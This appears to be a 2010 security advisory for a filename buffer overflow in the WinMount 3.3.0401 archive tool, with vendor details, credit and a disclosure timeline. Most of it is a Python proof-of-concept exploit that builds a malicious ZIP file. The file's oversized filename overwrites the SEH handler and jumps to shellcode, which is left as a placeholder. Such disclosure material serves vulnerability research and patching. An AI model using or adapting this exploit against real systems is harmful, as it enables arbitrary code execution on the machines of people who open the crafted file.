WinMount MOU 3.3.0401 File Handling Overflow

`WinMount MOU File Handling Overflow Vulnerability  
  
Vulnerability: WinMount 3.3.0401  
Vendor: www.winmount.com  
  
1) Software Description:  
WinMount is an useful windows utility. It is a compression tool, also a virtual drive tool. It can compress files, decompress/ browse/convert compressed archieves, it   
also can mount MOU ZIP RAR and CD DVD HDD images to a virtual disk or virtual folder. Supported formats: MOU ZIP RAR CAB ARJ ISO GZ BZ2 TAR WIM VHD VDI VMDK ISO ISZ BIN MDS/MDF NRG IMG CCD CUE APE FLAC WV.  
  
2) Details:  
A filename buffer overflow vulnerability in WinMount 3.3.0401. Poc can generate a zip file, and attackers can change the zip file into a mou file by using WinMount. Exploit successfully allows attackers to execute arbitrary code.  
  
3) Credit:  
The vulnerability was discovered by Lufeng Li  
  
4) Timeline:  
2010.04.12 Report to vendor  
2010.04.14 Vendor upgrade WinMount  
2010.04.16 Public  
  
5) Poc:  
import os  
  
sploitfile="test.zip"  
ldf_header =('\x50\x4B\x03\x04\x14\x00\x00'  
'\x00\x08\x00\xB7\xAC\xCE\x34\x00\x00\x00'  
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'  
'\xd0\xff'  
'\x00\x00\x00')  
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14"  
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\xd0\xff"  
"\x00\x00\x00\x00\x00\x00\x01\x00"  
"\x24\x00\x00\x00\x00\x00\x00\x00")  
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00"  
"\x00\x01\x00\x01\x00"  
"\xfe\xff\x00\x00"  
"\xee\xff\x00\x00"  
"\x00\x00")  
print "[+] Preparing payload\n"  
size=65484  
junk='A'*420  
nseh='\x89\x8a\x8b\x8c'  
seh='\x84\x5b\xac\x8d'  
junk_='A'*33  
jumpto='\x05\x12\x11\x46\x2d\x11\x11\x46\x50\x46\xac\xe4'#make eax point to shellcode and jump to shellcode  
shellcode=("the shellcode here will be changed into unicode")#encode by alpha2  
junk__='B'*80  
last='C'*(size-420-len(nseh+seh+junk_+jumpto+junk__+shellcode))  
payload=junk+nseh+seh+junk_+jumpto+junk__+shellcode+last+".wav"  
evilzip = ldf_header+payload+cdf_header+payload+eofcdf_header  
print "[+] Removing old zip file\n"  
os.system("del "+sploitfile)  
print "[+] Writing payload to file\n"  
fobj=open(sploitfile,"w",0)  
fobj.write(evilzip)  
print "generate zip file "+(sploitfile)  
fobj.close()  
print '[+] Wrote %d bytes to file sploitfile\n'%(len(evilzip))  
print "[+] Payload length :%d \n"%(len(payload))  
  
  
  
--------------  
lilf  
2010-04-17  
  
---------------------------------------------------------------------------------------------------  
Confidentiality Notice: The information contained in this e-mail and any accompanying attachment(s)   
is intended only for the use of the intended recipient and may be confidential and/or privileged of   
Neusoft Corporation, its subsidiaries and/or its affiliates. If any reader of this communication is   
not the intended recipient, unauthorized use, forwarding, printing, storing, disclosure or copying   
is strictly prohibited, and may be unlawful.If you have received this communication in error,please   
immediately notify the sender by return e-mail, and delete the original message and all copies from   
your system. Thank you.   
---------------------------------------------------------------------------------------------------  
`